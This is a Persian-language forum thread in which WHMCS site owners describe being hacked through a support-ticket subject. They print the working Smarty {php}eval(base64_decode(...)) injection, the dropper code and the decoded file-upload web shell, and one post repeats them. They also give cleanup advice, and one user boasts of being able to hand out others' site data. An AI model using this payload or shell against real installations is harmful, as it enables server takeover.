هک شدن از طریق whmcs5

[maryam1]

سلام الان دو روزه که از طریق یه تیکت هک میشم یه نفر میاد تو سایتم عضو میشه یه تیکت برام میفرسته که در موضوع تیکت یه کد php میزنه بعد راحت میاد داخل whm من جالبه بدونید whmcs من آخرین ورژن و با لایسنس هست کدشو الان ندارم چون یوزرشو حذف کردم تیکتشم حذف شد

[shafiei7]

به whmcs ریپورت بدید سریع

[maryam1]

چه طوری ریپورت بدم؟
این کدی هست که داخل موضوع برام تیکت میکنه

کد:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq  MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS  aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2  SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ  anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp  QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3  blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs  SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl  eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI  ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J  K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs  InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}

[vps-baran.ir]

اگه این طوری باشه که ما نباید آخرین ورژن رو آپدیت کنیم . مشکل امنیتی داره

[maryam1]

اینارو ولش یکی لینک ریپورت رو به من بده
این عربا دارن دونه دونه سایتهای ایرانی رو هک میکنن من اولیش نبودم آخریشم نیستم

---------- Post added at 11:34 AM ---------- Previous post was at 11:29 AM ----------

فایل شل رو درون
downloads/b0x.php
میریزه
الان کد رو دیکد کردم دیدم این فایل رو اجرا میکنه

[m3hdi]

با سلام
حضورتون عرض کنم کنه این مشکل مربوط به ورژن 5 نیست و در ورژن های پایینتر هم مشاهده شده
در حال بررسی هستیم

[dr.saeed]

سلام الان دو روزه که از طریق یه تیکت هک میشم یه نفر میاد تو سایتم عضو میشه یه تیکت برام میفرسته که در موضوع تیکت یه کد php میزنه بعد راحت میاد داخل whm من جالبه بدونید whmcs من آخرین ورژن و با لایسنس هست کدشو الان ندارم چون یوزرشو حذف کردم تیکتشم حذف شد

چه جالب/واسه منم همین اتفاق افتاد اما چون باگ ها پچ شده بود هک نشدیم!

[m3hdi]

خب
و اما کار این آقای باهوش 6 ساله از Saudi Arabia Saudinet Saudi Telecom Company چیه ؟
ایشون اومدن با این کد یک آپلودر در مسیر templates_c به نام red.php رایت کردند
به این صورت :

کد PHP:

$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$fo = fopen("templates_c/red.php","w");
fwrite($fo,$code); 


و محتوی $code هم به این شکل هست

کد PHP:

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

بنابراین ابتدا فایل red.php رو حذف کنید و سپس فایل های دیگر رو به جهت عدم وجود شل چک کنید
موفق باشید

[Masoud.B]

تمام ورژن ها از این راه هک میشن هنوز هم پچ نشده . هر کی میگه هک نمیشیم بگه تا اطلاعات سایتش رو بهش بدم

[vps-baran.ir]

خب
و اما کار این آقای باهوش 6 ساله از Saudi Arabia Saudinet Saudi Telecom Company چیه ؟
ایشون اومدن با این کد یک آپلودر در مسیر templates_c به نام red.php رایت کردند
به این صورت :

کد PHP:

$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$fo = fopen("templates_c/red.php","w");
fwrite($fo,$code); 


و محتوی $code هم به این شکل هست

کد PHP:

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

بنابراین ابتدا فایل red.php رو حذف کنید و سپس فایل های دیگر رو به جهت عدم وجود شل چک کنید
موفق باشید

مطمئنی اگه این کار رو بکنیم دیگه هک نمیشیم؟